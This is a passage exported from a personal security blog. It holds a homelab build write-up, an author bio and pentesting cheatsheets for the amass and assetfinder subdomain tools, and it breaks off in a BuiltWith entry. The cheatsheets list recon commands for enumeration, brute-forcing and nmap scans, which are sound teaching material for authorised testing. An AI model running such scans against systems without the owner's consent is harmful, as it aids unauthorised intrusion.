[{"content":"Like a lot of people, it started with YouTube and TikTok. I kept seeing videos about homelabs, what people were running, what it could do, why they built one, and it slowly pulled me in.\nFor me it came down to three things.\nFirst, security. I have a cybersecurity background, currently working toward a BS in cybersecurity, and my day job leans heavily on the sysadmin side with a security emphasis. But the work can get stagnant. Limited scope, slow technology adoption, not a lot of room to experiment. A homelab fixes that. It gives me a sandbox where I can actually try things without waiting for an approval process.\nSecond, learning. I wanted hands-on experience with tools and technologies I wasn\u0026rsquo;t getting exposure to at work. Reading about something and actually running it are very different things.\nThird, and honestly this one might be the most relatable, subscriptions. Everything is a subscription now. Cloud storage, media streaming, VPN, backup services. It adds up fast and you own nothing. I wanted to change that.\nThere was also a fourth reason, and it came out of nowhere. My router/modem combo decided to die around the same time I was going down the homelab rabbit hole. I called customer service and was told my device was outdated and that I needed to either rent their router or buy a compatible one. The modem would be free as long as I stayed with them, but the router was a rental. That didn\u0026rsquo;t sit right with me. If I was going to replace my networking gear anyway, I figured I might as well invest in something proper instead of paying monthly for equipment I\u0026rsquo;d never own. That decision spiraled pretty quickly into everything else you\u0026rsquo;re about to read.\nThe only thing standing between me and getting started was money. I didn\u0026rsquo;t want to spend a bunch upfront before I even knew if I\u0026rsquo;d stick with it. Then tax season came through. 
I know I\u0026rsquo;m overpaying, don\u0026rsquo;t bug me about it. I like to think of my tax return as a nice surprise once a year. Some of that money went toward the homelab, and you\u0026rsquo;ll see what I mean once I introduce you to the setup and what it cost to get here.\nThe Hardware and Why I Chose Each Piece\nOnce I decided I was going to replace my networking gear anyway, the question became what to replace it with. I was already familiar with TP-Link from my old router/modem combo, so I started looking into what else they made. That\u0026rsquo;s when I found Omada.\nOmada is TP-Link\u0026rsquo;s software-defined networking lineup, and once I saw what it offered I was sold. A built-in VPN server with client-to-site support, meaning I can access my home network securely from any device anywhere, centralized management of all network devices from one interface, and the ability to expand the setup as needed. The learning curve is steep if you\u0026rsquo;re new to networking. I have decent experience but had never touched SDNs before, so that was part of the appeal too.\nThe other thing that drove a lot of my decisions was the modem Spectrum provided. It has a 2.5 Gbps ethernet port, and once I saw that I wanted everything downstream to match. No point having a fast modem if your network gear is going to bottleneck it.\nHere\u0026rsquo;s what I ended up with on the networking side:\nTP-Link ER707-M2 — the router. Two 2.5 Gbps WAN ports plus six additional WAN/LAN ports. Handles routing, firewall, and the VPN server.\nWAN Ports: 2x 2.5 Gbps\nLAN Ports: 6x 1 Gbps WAN/LAN\nVPN: WireGuard, OpenVPN, IPSec\nManagement: Omada SDN\nOther: SPI Firewall, Load Balancing, Lightning Protection\nSG2210XMP-M2 — the switch. Eight 2.5 Gbps PoE+ ports and two SFP+ ports for future upgrades. 
The PoE+ is important, more on that in a second.\nPoE+ Ports: 8x 2.5 Gbps\nUplink Ports: 2x 10G SFP+\nPoE Budget: 240W\nManagement: Omada SDN\nTP-Link EAP770 — WiFi 7 access point with a 2.5 Gbps uplink, managed through Omada like everything else.\nWiFi Standard: WiFi 7 (802.11be)\nMax Speed: BE11000 Tri-band\nUplink: 2.5 Gbps\nPower: PoE+\nManagement: Omada SDN\nI\u0026rsquo;d also be doing this section a disservice if I didn\u0026rsquo;t mention the device that started it all before the tax return came through. An old Acer Predator laptop, i7-7700HQ, 8 GB of RAM. Nothing special by today\u0026rsquo;s standards but it was what I had. Before I bought a single piece of equipment, that laptop was my testing ground. I installed Pi-hole on it, tried out different operating systems, broke things, fixed things, and figured out what I actually wanted to build. It was messy and unorganized but that\u0026rsquo;s kind of the point when you\u0026rsquo;re learning.\nIt\u0026rsquo;s still in the mix today. Once I got the Mini PC up and running Proxmox, I installed Proxmox on the laptop too and joined it to the same cluster. It now serves as a failover node. Not the most powerful machine in the stack, but it doesn\u0026rsquo;t need to be. If the Mini PC goes down for maintenance or something unexpected happens, the laptop is there to keep things running.\nModel: Acer Predator Helios 300 G3-571\nCPU: Intel Core i7-7700HQ @ 2.80GHz (8 threads)\nRAM: 8 GB\nRole: Proxmox failover node\nFor the server side, I wanted something small. I didn\u0026rsquo;t want a full rack or a loud tower sitting somewhere. I went with a Mini PC that punches well above its weight, 48 GB of RAM, dual 2.5 Gbps NICs, enough cores to run a bunch of VMs simultaneously, and a CPU with a low enough power draw that leaving it on 24/7 doesn\u0026rsquo;t hurt. 
It\u0026rsquo;s running Proxmox as the hypervisor, which lets me spin up and tear down virtual machines without touching the host.\nModel: GMKtec K15 AI\nCPU: Intel Core Ultra 5 125U\nRAM: 48 GB DDR5\nStorage: 1 TB NVMe SSD\nNetworking: Dual 2.5 Gbps NICs\nOther: OCuLink, USB4, HDMI 2.1\nRole: Proxmox hypervisor / primary compute\nI also picked up two Raspberry Pi 5s, 16 GB RAM each. Raspis are great for containerization and I wanted to learn Docker Swarm. They\u0026rsquo;re small, efficient, and more than capable of running a solid number of containers. Combined with the GeeekPi PoE+ NVMe hats I grabbed for each one, they\u0026rsquo;re powered directly from the switch over ethernet. No separate power bricks, no extra cables, just one ethernet cable each. That\u0026rsquo;s the PoE+ I mentioned.\nModel: Raspberry Pi 5 x2\nCPU: Broadcom BCM2712, 4 cores @ 2.4GHz\nRAM: 16 GB\nStorage: SD card (NVMe upgrade planned)\nPower: PoE+ via GeeekPi P33 hat\nRole: Docker Swarm manager nodes\nModel: GeeekPi P33 PoE+ NVMe Hat\nPower: PoE+ (802.3at)\nStorage: M.2 NVMe slot (2230/2242/2260/2280)\nCooling: Official Pi 5 active cooler mount\nFor storage, I went with the UGREEN NASync DH4300 Plus. It was on discount, which was honestly the deciding factor. It supports up to 128 TB, has a 2.5 Gbps ethernet port, and runs its own OS with Docker support. I didn\u0026rsquo;t have the budget to buy proper NAS drives right away, so I\u0026rsquo;m currently running whatever spare hard drives I had lying around the house. It works, but it\u0026rsquo;s janky and I know it. Four 16 TB drives are on the list when the budget allows.\nModel: UGREEN NASync DH4300 Plus\nBays: 4\nMax Capacity: 128 TB\nRAM: 8 GB LPDDR4X\nNetworking: 2.5 Gbps ethernet\nOS: UGOS Pro\nCurrent Drives: 4x 16 TB\nHonestly, if I\u0026rsquo;m being transparent, most of my decision making came back to one thing. The modem had a 2.5 Gbps port and I wanted everything to match. Future-proofing by making it uniform throughout. 
Everything else kind of fell into place around that.\nThe Physical Setup (Honest Edition)\nIf you were expecting a clean rack setup with velcro cable ties and perfect airflow, I\u0026rsquo;m sorry to disappoint. Everything lives in my TV stand.\nIt\u0026rsquo;s cluttered. I\u0026rsquo;ll be the first to admit it. I made an attempt at cable management and got about halfway there. The cables behind the TV stand are somewhat under control, but the top shelf is a different story. It is what it is for now.\nThe bigger concern heading into summer is heat. Everything is packed into an enclosed TV stand with limited airflow and I genuinely don\u0026rsquo;t know how the equipment is going to handle the warmer months. That\u0026rsquo;s something I need to figure out before it becomes a problem.\nThere\u0026rsquo;s also the matter of power. Right now everything is plugged into a single outlet. No UPS, no surge protection worth mentioning. One bad power fluctuation and I could be looking at fried equipment or corrupted NAS drives. A UPS is high on the list of things to address. It\u0026rsquo;s not a matter of if, it\u0026rsquo;s a matter of when.\nBasically, the physical setup works but it\u0026rsquo;s held together with good intentions and a little bit of luck. There\u0026rsquo;s room for improvement and I know it.\nWhat\u0026rsquo;s Actually Running on It\nThis is where things get interesting. The homelab isn\u0026rsquo;t just sitting there looking pretty, it\u0026rsquo;s actually doing things.\nOn the virtualization side, Proxmox is running several VMs on the Mini PC. The first is an RHEL IDM server, which handles identity management for the lab. Think centralized user accounts and authentication, the same kind of setup you\u0026rsquo;d find in an enterprise environment. A redundant IDM server is in the works so there\u0026rsquo;s a failover if the first one goes down.\nThere are two VMs running Pi-hole with Unbound. 
Pi-hole handles network-wide ad blocking and Unbound sits behind it as a recursive DNS resolver, meaning DNS queries don\u0026rsquo;t get forwarded to a third party like Google or Cloudflare. They resolve directly from authoritative nameservers. Two instances mean if one goes down for maintenance, the other keeps the network running without skipping a beat. It\u0026rsquo;s been working great.\nOne VM is dedicated to hosting the Omada SDN controller application. You can buy a physical Omada controller, but why spend the money when you can just spin up a VM and install the software? Same functionality, no extra hardware.\nThere\u0026rsquo;s also a Grafana VM for monitoring. Still a work in progress, but the goal is a unified dashboard pulling metrics from everything in the lab. A VM running OpenVAS Community Edition handles vulnerability scanning, which ties back to the security side of why I built this in the first place. It scans the network for known vulnerabilities and misconfigurations so I know what needs attention.\nFinally there\u0026rsquo;s an Ubuntu VM that\u0026rsquo;s part of a Docker Swarm cluster along with the two Raspberry Pi 5s. The Swarm is running a few things worth mentioning. STIG Manager for system hardening and security compliance, the arr stack for media self hosting (Jellyfin, Sonarr, Radarr, and Prowlarr if those mean anything to you), and Portainer as a management UI for the containers.\nOne more thing. There\u0026rsquo;s a VM running a Ghost and Nginx Proxy Manager Docker stack that\u0026rsquo;s hosting this very website. So if you\u0026rsquo;re reading this, you\u0026rsquo;re being served content straight from my TV stand. Make of that what you will.\nWhere It\u0026rsquo;s Going\nThe dream is a proper enterprise grade server rack. Clean, organized, everything mounted and labeled. That\u0026rsquo;s not happening anytime soon though. I rent, so a full rack setup isn\u0026rsquo;t really an option right now. 
Maybe one day.\nIn the more immediate future, the priority is a UPS. Everything is still plugged into a single outlet and it\u0026rsquo;s been that way for about three months now. The 4x16 TB drives just arrived and I\u0026rsquo;ve already migrated the NAS. I had zero power protection during the whole process. Not my brightest moment, but it worked out. A UPS is still happening though. The drives are in, the data is there, and one bad power event could ruin all of it. It\u0026rsquo;s next on the list.\nOn the hardware side, I want to build out a proper 4-node Raspberry Pi cluster using one of those DeskPi rack cases. Get a small switch that fits inside it, mount the Pis properly, and finally replace the SD cards with NVMe SSDs so the OS isn\u0026rsquo;t running on hardware that could fail without warning. I\u0026rsquo;d also like to get the Mini PC and NAS mounted in there and maybe pick up a second Mini PC so everything is uniform.\nLonger term, I want to build a dedicated server for running a local LLM at home. Paired with OpenClaw, a free and open source autonomous AI agent that runs on top of LLMs and uses messaging platforms as its main interface, the idea is to have a self hosted AI setup that doesn\u0026rsquo;t rely on any cloud services. Is it a need? Absolutely not. But it sounds like a fun project and that\u0026rsquo;s reason enough.\nThe homelab is a living thing. It grows, it changes, and it occasionally breaks at the worst possible time. That\u0026rsquo;s kind of the point. More updates to come.\n— d3vilsec\n","permalink":"https://d3vilsec.com/posts/homelab-2026/","summary":"Like a lot of people, it started with YouTube and TikTok. I kept seeing videos about homelabs, what people were running, what it could do, why they built one, and it slowly pulled me in.","title":"My Homelab in 2026 — How It Started and What I'm Running"},{"content":"Marine veteran. IT professional. 8+ years of experience and most of it earned the hard way — in a fast-paced environment where you either adapt or fall behind. I got my start in the Corps as a Data Systems Administrator and haven\u0026rsquo;t stopped learning since.\nThese days I work as a sysadmin with my sights set on cybersecurity. Currently working toward a B.S. in Cybersecurity and Information Assurance while building out a homelab that\u0026rsquo;s taught me more than any classroom has.\nThis site is a knowledge base, a blog, and a personal portfolio rolled into one. I built it to document my work, share what I\u0026rsquo;ve learned, and maybe save someone else a few hours of troubleshooting. If you\u0026rsquo;re a beginner trying to figure out where to start, an IT professional looking to level up, or just someone who stumbled in from a search — there\u0026rsquo;s probably something here for you.\nEverything on this site is stuff I\u0026rsquo;ve actually built, broken, and fixed myself. No fluff.\n","permalink":"https://d3vilsec.com/about/","summary":"Marine veteran. IT professional. 8+ years of experience and most of it earned the hard way — in a fast-paced environment where you either adapt or fall behind.","title":"About"},{"content":"amass Cheatsheet\nType: Actively maintained subdomain discovery — extensive data sources \u0026amp; tool integrations\nNote: the flags, the intel subcommand and the INI config on this sheet follow the amass v3 command line. The go install line below pulls v4, which reworked the CLI and moved configuration to YAML, so check amass -h for the version you actually have installed.\nInstallation\nsudo apt install amass\n# or\ngo install -v github.com/owasp-amass/amass/v4/...@master\n# or\nsnap install amass\nSubcommands\nenum — Subdomain enumeration (main command)\nintel — Collect intel about an organisation\nviz — Visualise enumeration results\ntrack — Track differences between enumerations\ndb — Interact with the graph database\nenum — Subdomain Enumeration\n# Basic passive enumeration (no DNS queries against the target)\namass enum -passive -d example.com\n# Active enumeration (resolves names, attempts zone transfers and grabs names from certificates)\namass enum -active -d example.com\n# Brute force with the built-in wordlist\namass enum -brute -d example.com\n# Brute force with your own wordlist\namass enum -brute -w wordlist.txt -d example.com\n# Multiple domains\namass enum -d example.com -d example.org\n# Domains from file\namass enum -df domains.txt\n# Output to file\namass enum -d example.com -o output.txt\n# Output to JSON\namass enum -d example.com -json output.json\n# Show the data source for each result\namass enum -d example.com -src\n# Verbose\namass enum -v -d example.com\n# Set timeout (minutes)\namass enum -d example.com -timeout 30\n# Use specific resolvers\namass enum -d example.com -r 8.8.8.8,1.1.1.1\n# Use resolver list\namass enum -d example.com -rf resolvers.txt\n# Exclude data sources\namass enum -d example.com -exclude CrtSearch\n# Only specific data sources\namass enum -d example.com -include Wayback,CrtSearch\nCommon Flags (enum)\n-d \u0026lt;domain\u0026gt; — Target domain\n-df \u0026lt;file\u0026gt; — File with list of domains\n-passive — Passive only (no DNS resolution)\n-active — Active DNS (zone transfer, cert grabbing)\n-brute — Enable brute force\n-w \u0026lt;wordlist\u0026gt; — Wordlist for brute force\n
-o \u0026lt;file\u0026gt; — Output results to file\n-json \u0026lt;file\u0026gt; — Output as JSON\n-src — Show data source for each result\n-ip — Show IP addresses\n-r \u0026lt;resolvers\u0026gt; — Comma-separated resolver IPs\n-rf \u0026lt;file\u0026gt; — File of resolver IPs\n-timeout \u0026lt;n\u0026gt; — Timeout in minutes\n-v — Verbose\n-config \u0026lt;file\u0026gt; — Config file path\n-dir \u0026lt;path\u0026gt; — Directory for output/database\nintel — Org Recon\n# Find domains by organisation name\namass intel -org \u0026#34;Target Corp\u0026#34;\n# Reverse whois: other domains registered with the same details\namass intel -whois -d example.com\n# Domains found in an ASN\namass intel -asn 12345\n# Domains found in a CIDR block (use -addr for a single IP or a range such as 192.168.1.1-254; -ip is a boolean that only prints addresses next to discovered names)\namass intel -cidr 192.168.1.0/24\nConfiguration File\nConfig file at ~/.config/amass/config.ini (or specify with -config). This INI layout is the amass v3 format; v4 reads a YAML config.yaml and keeps API keys in a separate datasources.yaml, so a v4 install will not pick this file up as-is.\n[resolvers]\nresolver = 8.8.8.8\nresolver = 1.1.1.1\n[bruteforce]\nenabled = true\nwordlist_file = /path/to/wordlist.txt\nrecursive = true\nminimum_for_recursive = 1\n[alterations]\nenabled = true\n[data_sources]\n# API keys for passive data sources\n[data_sources.Shodan]\n[data_sources.Shodan.Credentials]\napikey = YOUR_KEY_HERE\nRecommended Wordlists\n/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt\n/usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt\n# Amass also ships with its own wordlist:\n# /usr/share/amass/wordlists/\nExample Full Run\n# Passive (fast, stealthy)\namass enum -passive -d example.com -src -o passive_results.txt\n# Active + brute force (thorough)\namass enum -active -brute \\\n  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \\\n  -d example.com \\\n  -src -ip \\\n  -json amass_results.json \\\n  -timeout 60\n","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/dns-and-subdomains/amass/","summary":"amass Cheatsheet. Type: Actively maintained subdomain discovery — extensive data sources \u0026amp; tool integrations.","title":"amass"},{"content":"assetfinder Cheatsheet\nType: Simple, lightweight subdomain finder using multiple passive data sources — ideal for quick recon\nInstallation\ngo install github.com/tomnomnom/assetfinder@latest\n# Binary ends up in ~/go/bin/assetfinder\n# Or download pre-built binary\nwget 
https://github.com/tomnomnom/assetfinder/releases/latest/download/assetfinder-linux-amd64.tgz tar xf assetfinder-linux-amd64.tgz mv assetfinder /usr/local/bin/ Basic Usage assetfinder \u0026lt;domain\u0026gt; assetfinder example.com Flags Flag Description --subs-only Show only subdomains (filter out related domains / TLD variants) Common Commands # All results (subdomains + related domains) assetfinder example.com # Subdomains only (most common usage) assetfinder --subs-only example.com # Save to file assetfinder --subs-only example.com \u0026gt; subdomains.txt # Multiple domains from stdin cat domains.txt | xargs -I{} assetfinder --subs-only {} # Pipe into other tools assetfinder --subs-only example.com | httprobe # Check live hosts assetfinder --subs-only example.com | sort -u # Deduplicate Data Sources Used crt.sh (Certificate transparency logs) certspotter (SSL cert monitoring) hackertarget (Passive DNS) threatcrowd (Threat intelligence) wayback (Wayback Machine / archive.org) dnsdumpster (DNS recon service) facebook CT (Facebook certificate transparency) virustotal (Passive DNS) findsubdomains.com Pipeline Examples # Find subdomains → probe for live web servers → save assetfinder --subs-only example.com | httprobe | tee live_hosts.txt # Find subdomains → resolve to IPs assetfinder --subs-only example.com | \\ xargs -I{} dig +short {} | grep -v \u0026#34;^$\u0026#34; | sort -u # Find subdomains → run nmap on live ones assetfinder --subs-only example.com | \\ httprobe | sed \u0026#39;s/https\\?:\\/\\///\u0026#39; | \\ xargs -I{} nmap -p 80,443 {} # Combine with other tools for coverage (assetfinder --subs-only example.com; \\ subfinder -d example.com -silent; \\ amass enum -passive -d example.com) | sort -u \u0026gt; all_subs.txt Notes Passive only — does not brute force DNS or make queries to the target Fast and lightweight — great first pass before heavier tools No API keys needed for most sources (some may be rate-limited) Output may contain duplicates — 
always pipe through sort -u ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/dns-and-subdomains/assetfinder/","summary":"\u003ch1 id=\"assetfinder-cheatsheet\"\u003eassetfinder Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eType:\u003c/strong\u003e Simple, lightweight subdomain finder using multiple passive data sources — ideal for quick recon\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"installation\"\u003eInstallation\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ego install github.com/tomnomnom/assetfinder@latest\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Binary ends up in ~/go/bin/assetfinder\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Or download pre-built binary\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewget https://github.com/tomnomnom/assetfinder/releases/latest/download/assetfinder-linux-amd64.tgz\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003etar xf assetfinder-linux-amd64.tgz\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003emv assetfinder /usr/local/bin/\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"basic-usage\"\u003eBasic Usage\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" 
style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eassetfinder \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eassetfinder example.com\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"flags\"\u003eFlags\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--subs-only\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eShow only subdomains (filter out related domains / TLD variants)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"common-commands\"\u003eCommon Commands\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# All results (subdomains + related domains)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eassetfinder example.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Subdomains only (most common usage)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003eassetfinder --subs-only example.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Save to file\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eassetfinder --subs-only example.com \u0026gt; subdomains.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Multiple domains from stdin\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecat domains.txt | xargs -I\u003cspan style=\"color:#f92672\"\u003e{}\u003c/span\u003e assetfinder --subs-only \u003cspan style=\"color:#f92672\"\u003e{}\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Pipe into other tools\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eassetfinder --subs-only example.com | httprobe         \u003cspan style=\"color:#75715e\"\u003e# Check live hosts\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eassetfinder --subs-only example.com | sort -u          \u003cspan style=\"color:#75715e\"\u003e# Deduplicate\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"data-sources-used\"\u003eData Sources Used\u003c/h2\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ecrt.sh               (Certificate transparency 
logs)\ncertspotter          (SSL cert monitoring)\nhackertarget         (Passive DNS)\nthreatcrowd          (Threat intelligence)\nwayback              (Wayback Machine / archive.org)\ndnsdumpster          (DNS recon service)\nfacebook CT          (Facebook certificate transparency)\nvirustotal           (Passive DNS)\nfindsubdomains.com\n\u003c/code\u003e\u003c/pre\u003e\u003chr\u003e\n\u003ch2 id=\"pipeline-examples\"\u003ePipeline Examples\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Find subdomains → probe for live web servers → save\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eassetfinder --subs-only example.com | httprobe | tee live_hosts.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Find subdomains → resolve to IPs\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eassetfinder --subs-only example.com | \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  xargs -I\u003cspan style=\"color:#f92672\"\u003e{}\u003c/span\u003e dig +short \u003cspan style=\"color:#f92672\"\u003e{}\u003c/span\u003e | grep -v \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;^\u003c/span\u003e$\u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u003c/span\u003e | sort -u\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Find subdomains → run nmap on live ones\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eassetfinder --subs-only example.com | \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  httprobe | sed \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;s/https\\?:\\/\\///\u0026#39;\u003c/span\u003e | \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  xargs -I\u003cspan style=\"color:#f92672\"\u003e{}\u003c/span\u003e nmap -p 80,443 \u003cspan style=\"color:#f92672\"\u003e{}\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Combine with other tools for coverage\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eassetfinder --subs-only example.com; \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e subfinder -d example.com -silent; \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e amass enum -passive -d example.com\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e | sort -u \u0026gt; all_subs.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 
id=\"notes\"\u003eNotes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ePassive only\u003c/strong\u003e — does not brute force DNS or make queries to the target\u003c/li\u003e\n\u003cli\u003eFast and lightweight — great first pass before heavier tools\u003c/li\u003e\n\u003cli\u003eNo API keys needed for most sources (some may be rate-limited)\u003c/li\u003e\n\u003cli\u003eOutput may contain duplicates — always pipe through \u003ccode\u003esort -u\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e","title":"assetfinder"},{"content":"BuiltWith Cheatsheet Purpose: Passive technology profiling of a domain — current stack plus historical changes, hosting, analytics, ad networks, ecommerce, CDN, certificates, and more. Useful for OSINT recon without touching the target.\nFormat: Web service (free tier + paid API). No local install required for basic lookups.\nAccess Points Surface URL Profile lookup (single domain) https://builtwith.com/ Free quick lookup https://builtwith.com/? 
